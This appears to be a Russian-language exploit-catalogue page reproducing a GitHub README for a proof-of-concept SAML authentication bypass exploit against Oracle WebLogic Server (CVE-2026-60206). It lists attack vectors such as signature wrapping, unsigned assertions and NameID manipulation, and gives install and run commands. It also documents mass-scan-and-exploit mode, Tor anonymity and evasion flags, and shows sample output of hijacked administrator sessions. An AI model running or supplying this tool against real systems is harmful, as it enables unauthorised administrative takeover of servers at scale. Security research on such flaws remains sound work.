Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-60206 — Технический анализ и Proof-of-Concept для CVE-2026-60206 — критической уязвимости обхода аутентификации SAML в Oracle WebLogic Server. | Kitploit
Инструменты/GitHubGitHub/debajyoti0-0/cve-2026-60206
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификация
GitHubdebajyoti0-0/cve-2026-60206

CVE-2026-60206

Технический анализ и Proof-of-Concept для CVE-2026-60206 — критической уязвимости обхода аутентификации SAML в Oracle WebLogic Server.

Репозиторий
26 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-60206 – PoC обхода аутентификации SAML в Oracle WebLogic Server

Этот репозиторий предоставляет proof‑of‑concept эксплойт для CVE‑2026‑60206 — критической уязвимости обхода аутентификации в реализации SAML в Oracle WebLogic Server. Уязвимость позволяет удалённому злоумышленнику с низкими привилегиями полностью скомпрометировать сервер путём подделки SAML-утверждений (assertions).

CVSS

⚠️ Предупреждение: Этот инструмент предназначен только для авторизованных исследований и тестирования безопасности. Используйте его исключительно против систем, которыми вы владеете или на тестирование которых у вас есть явное разрешение. Авторы не несут ответственности за неправомерное использование.

Логотип CVE-2026-60206

🔥 Обзор уязвимости

CVE-2026-60206 затрагивает компонент Core в Oracle WebLogic Server. Уязвимость вызвана некорректной обработкой аутентификации в реализации протокола SAML. Множество векторов атаки — таких как XML Signature Wrapping (XSW), принятие неподписанных утверждений, манипуляция NameID и обход ограничений audience/conditions — позволяют злоумышленнику выдавать себя за произвольных пользователей (например, weblogic) и получать административный доступ.

Затронутые версии:

  • 12.2.1.4.0
  • 14.1.1.0.0
  • 14.1.2.0.0
  • 15.1.1.0.0

PoC реализует следующие векторы атаки:

  • XML Signature Wrapping (XSW) — структурная манипуляция, заставляющая обработчик SAML принять неподписанное утверждение.
  • Внедрение неподписанного утверждения — создание полностью неподписанного SAML-ответа (если WantAssertionsSigned не принудительно включён).
  • Манипуляция NameID — запутывание сопоставителя учётных записей (identity mapper) с помощью XML-комментариев, пробельных символов или путаницы форматов.
  • Обход ограничения Audience — удаление или изменение AudienceRestriction для расширения области действия.
  • Обход Conditions/времени — манипуляция NotBefore/NotOnOrAfter для обхода проверок срока действия.
  • Комбинированная атака — XSW + неподписанное внутреннее утверждение + манипуляция NameID (наиболее вероятный сценарий успеха).
  • Replay (повторное воспроизведение) — повторная отправка перехваченного SAML-ответа с изменённым Destination/Recipient.

✨ Возможности

  • Несколько режимов атаки — выбор из all, unsigned, xsw, nameid, audience, conditions, combo или replay.
  • Массовое сканирование — параллельное обнаружение и опциональная эксплуатация множества целей (через -l).
  • Определение версии — точная идентификация версии WebLogic по заголовкам, страницам ошибок и WSDL.
  • Поиск SAML-эндпоинтов — автоматическое обнаружение SAML ACS, метаданных и SP-инициированных эндпоинтов.
  • Поддержка Tor — маршрутизация трафика через Tor (SOCKS5/HTTP/SOCKS4) для анонимности.
  • Повторная отправка сырых HTTP-запросов — отправка произвольных сырых HTTP-запросов из файла (-r).
  • Поддержка HTTP/2 — автоматически использует httpx, если он установлен, в противном случае — requests (HTTP/1.1).

📦 Установка

root@kitploit:~
git clone https://github.com/Debajyoti0-0/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt

Обязательно: requests, urllib3

Опционально (расширяет функциональность):

  • httpx — для поддержки HTTP/2
  • lxml — для улучшенного разбора SAML
  • signxml, cryptography — для обработки подписей (не требуется для эксплуатации)

🚀 Использование

Одиночная цель — только обнаружение

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --detect

Одиночная цель — все векторы атаки

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode all -u weblogic

Одиночная цель — конкретный режим атаки

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode combo -u admin

Массовое сканирование — определение версий из файла

root@kitploit:~
python CVE-2026-60206.py -l targets.txt -o results.json

Массовое сканирование — обнаружение + эксплуатация

root@kitploit:~
python CVE-2026-60206.py -l targets.txt --exploit -o results.csv --threads 20

Повторная отправка перехваченного SAML-ответа

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode replay --replay-file captured.xml

Использование Tor и проверка подключения

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --tor --check-tor

Отправка сырого HTTP-запроса из файла

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 -r request.txt --method POST

Быстрая проверка уязвимости (без эксплуатации)

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 -c

⚙️ Справочник флагов

Параметры:

Цель:

FlagОписание
-t, --target TARGETURL одиночной цели (например, https://host:7002).
-l, --list LISTФайл со списком целей для массового сканирования или одиночный URL.

Параметры запросов:

Конфигурация атаки:

Массовое сканирование (с -l):

FlagОписание
--exploitПроверять неподписанное SAML-утверждение (по умолчанию: только обнаружение).
-T, --threads THREADSКоличество параллельных потоков (по умолчанию: 10).

Вывод:

FlagОписание
-v, --verboseПовысить подробность вывода (отладочный вывод).
-q, --quiet

🧪 Режимы подробно

detect

Выполняет определение версии и поиск SAML-эндпоинтов. Атака не запускается.

unsigned

Внедряет полностью неподписанное SAML-утверждение. Если на цели не принудительно включён WantAssertionsSigned, это полностью обходит аутентификацию.

Варианты: unsigned (по умолчанию), unsigned_stripped (удаляет все ссылки на подпись).

xsw (XML Signature Wrapping)

Помещает вредоносное неподписанное утверждение перед допустимым подписанным утверждением (или оборачивая его). Обработчик SAML может выбрать первое утверждение, в то время как проверка подписи проверяет подписанное.

Варианты: xsw1 (простое добавление в начало), xsw2 (тот же ID, что и у оригинала), xsw3 (вложенная обёртка), xsw4 (соседний элемент).

nameid

Манипулирует полем NameID, чтобы запутать сопоставитель учётных записей WebLogic, позволяя выдавать себя за другого пользователя.

Варианты: comment_injection, whitespace, format_confusion, xpath_injection.

audience

Обходит проверки AudienceRestriction путём удаления или изменения элемента audience.

Варианты: remove_audience, wildcard_audience, extra_audience.

conditions

Обходит ограничения по времени (например, NotBefore, NotOnOrAfter).

Варианты: future_timestamp, expired_timestamp, remove_conditions, infinite_validity.

combo

Объединяет XSW, неподписанное утверждение и манипуляцию NameID в одном пейлоаде — наиболее вероятный вектор полной компрометации.

Варианты: combo_full (с внедрением комментария), combo_stealth (с переводом строки).

replay

Повторно отправляет ранее перехваченный SAML-ответ, опционально изменяя Destination или удаляя ограничения audience.

Варианты: replay_modified (изменяет Destination/Recipient), replay_cross_sp (удаляет ограничения audience).

📝 Пример рабочего процесса (эксплуатация одиночной цели)

root@kitploit:~
$ python CVE-2026-60206.py -t https://192.168.1.100:7002 -u weblogic --mode combo

  ╔══════════════════════════════════════════════════════════════════════╗
  ║       CVE-2026-60206 — WebLogic SAML Authentication Bypass PoC       ║
  ║         Oracle WebLogic Server Core | CVSS 9.9 | CWE-287             ║
  ╚══════════════════════════════════════════════════════════════════════╝

🔍 Detecting WebLogic version and SAML configuration...
  Detected WebLogic version: 12.2.1.4.0
  ⚠️  Version 12.2.1.4.0 is IN SCOPE for CVE-2026-60206!
  Found SAML metadata: /saml2/sp/metadata
  Found SAML ACS: /saml2/sp/acs (HTTP 200)

============================================================
🚀 Starting comprehensive SAML attack suite
   Target: https://192.168.1.100:7002
   Target User: weblogic
============================================================

── Attack 1/2 ──
🎯 [combo/combo_full] Launching combined attack for: weblogic
✅ [combo/combo_full] Authentication bypass SUCCEEDED! Logged in as: weblogic
   ACS Endpoint: /saml2/sp/acs

── Attack 2/2 ──
🎯 [combo/combo_stealth] Launching combined attack for: weblogic
✅ [combo/combo_stealth] Authentication bypass SUCCEEDED! Logged in as: weblogic
   ACS Endpoint: /saml2/sp/acs

============================================================
📊 Results: 2/2 attack vectors succeeded
============================================================

 EXPLOIT SUCCESSFUL! 2 attack(s) bypassed authentication.
   - [combo/combo_full] → logged in as 'weblogic' via /saml2/sp/acs
   - [combo/combo_stealth] → logged in as 'weblogic' via /saml2/sp/acs
📄 Report saved: logs/report_20260725_123456.json

📝 Пример рабочего процесса (массовое сканирование)

root@kitploit:~
$ python CVE-2026-60206.py -l targets.txt --exploit -o scan_results.csv --threads 10

============================================================
  CVE-2026-60206 Mass Scanner
  Targets: 50
  Threads: 10
  Mode:    Exploit
============================================================

  [10/50] 20.0% | Vuln:3 | Pwned:1 | 1.2 tgt/s  
  [!] VULN: https://10.0.0.5:7002 (12.2.1.4.0)
  [!!] PWNED: https://10.0.0.5:7002 - logged in as weblogic
  ... (continues) ...

============================================================
  SCAN SUMMARY
============================================================
  Total targets:   50
  Reachable:       45
  WebLogic:        12
  Vuln version:    8
  Exploited:       3
  Duration:        42.5s
============================================================

  [!!] SUCCESSFULLY EXPLOITED:
    https://10.0.0.5:7002 → weblogic via /saml2/sp/acs
    https://10.0.0.10:7002 → weblogic via /saml2/sp/acs
    https://10.0.0.15:7002 → weblogic via /saml2/sp/acs

  [!] VULNERABLE VERSIONS (not yet exploited):
    https://10.0.0.20:7002 (14.1.1.0.0)
    https://10.0.0.25:7002 (15.1.1.0.0)
    ... (truncated)

🛠️ Создание уязвимой тестовой среды

Для безопасного тестирования этого PoC настройте WebLogic Server со включённым SAML и одной из затронутых версий. Например, можно использовать Docker:

root@kitploit:~
# Example (simplified – use official Oracle WebLogic images with SAML configuration)
docker run -p 7002:7002 container-registry.oracle.com/middleware/weblogic:12.2.1.4
# Then configure SAML via WebLogic console or scripts

Конфигурация SAML должна включать как минимум один SAML 2.0 Service Provider с эндпоинтом ACS (например, /saml2/sp/acs) и опубликованными метаданными.

🔗 Ссылки

  • Уведомление Oracle Critical Patch Update за июль 2026 г.
  • CVE-2026-60206 — описание (NIST NVD)
  • CWE-287: Некорректная аутентификация
  • Анализ безопасности SAML 2.0 — XML Signature Wrapping

📜 Лицензия

Этот проект распространяется под лицензией GNU v3.0 — подробности см. в файле LICENSE.

🤝 Участие в разработке

Приветствуются issues и pull requests. Пожалуйста, убедитесь, что ваш вклад соответствует тем же этическим правилам использования.

Помните: Всегда получайте надлежащее разрешение перед тестированием любого инструмента безопасности. Оставайтесь этичными!

Скачать инструмент
  • Ротация User-Agent — использование случайного или собственного User-Agent.
  • Поддержка прокси — отправка всех запросов через HTTP/SOCKS прокси.
  • Настройка запросов — установка таймаутов, повторов, задержек, отключение редиректов и повтор при совпадении с регулярным выражением.
  • Сохранение пейлоадов — сохранение сгенерированных SAML-пейлоадов на диск (--save-payloads).
  • Проверка уязвимости (-c / --check) — быстрое определение уязвимости цели (без эксплуатации).
  • Вывод отчётов в JSON/CSV — структурированные результаты для массовых сканирований.
  • Подробное логирование — детальный вывод отладки с цветной консолью.
  • FlagОписание
    -h, --helpПоказать справочное сообщение и выйти.
    --proxy PROXYURL прокси (переопределяется --tor, если он используется).
    --no-verifyОтключить проверку SSL-сертификатов.
    --cookie COOKIEСессионные cookie (например, name=value; name2=value2).
    --auth AUTHУчётные данные базовой аутентификации (USER:PASS).
    -f, --file FILEПсевдоним для --list.
    FlagОписание
    -r, --requestfile REQUESTFILEЗагрузить сырой HTTP-запрос из файла (заменяет SAML-атаки).
    --method METHODИспользуемый HTTP-метод (для сырого или одиночного запроса; по умолчанию: GET).
    --random-agentИспользовать случайный User-Agent из встроенного списка.
    -A, --user-agent USER_AGENTСобственное значение заголовка User-Agent.
    --torИспользовать анонимную сеть Tor (SOCKS5 по умолчанию).
    --tor-port TOR_PORTПорт прокси Tor (по умолчанию: 9050).
    --tor-type {HTTP,SOCKS4,SOCKS5}Тип прокси Tor (по умолчанию: SOCKS5).
    --check-torПроверить, корректно ли используется Tor (выход с вердиктом).
    --delay DELAYЗадержка в секундах между запросами.
    --timeout TIMEOUTТаймаут в секундах (по умолчанию: 30).
    --retries RETRIESКоличество повторов при таймауте/ошибках (по умолчанию: 3).
    --retry-on RETRY_ONПовторить запрос, если содержимое ответа соответствует регулярному выражению (например, 'captcha').
    -dr, --disable-redirectsОтключить переходы по HTTP-редиректам.
    FlagОписание
    -m, --mode {all,detect,unsigned,xsw,nameid,audience,conditions,combo,replay}Режим атаки (по умолчанию: all).
    --detectТолько определение версии WebLogic и конфигурации SAML (без атаки).
    -c, --checkБыстрая проверка уязвимости (только обнаружение, выход с вердиктом).
    -u, --user USERЦелевой пользователь, за которого выдавать себя (по умолчанию: weblogic).
    --groups GROUPSГруппы для включения в SAML-утверждение (по умолчанию: Administrators,Monitors).
    --issuer ISSUEREntity ID издателя (Issuer) SAML.
    --audience AUDIENCEEntity ID аудитории (Audience) SAML.
    --relay-state RELAY_STATEПараметр RelayState для SAML POST.
    --base64Кодировать SAML-ответ в Base64 при POST-запросе.
    --extra-attrs [NAME=VALUE ...]Дополнительные атрибуты SAML (например, role=admin).
    --replay-file REPLAY_FILEПуть к перехваченному SAML-ответу для повторной отправки.
    --save-payloadsСохранять сгенерированные SAML-пейлоады в ./payloads/.
    --continue-on-successПродолжать тестирование после успешной атаки.
    Подавить несущественный вывод.
    --list-modesВывести список всех режимов атаки с описаниями и выйти.
    -o, --output OUTPUTЗаписать отчёт в формате JSON или CSV в файл.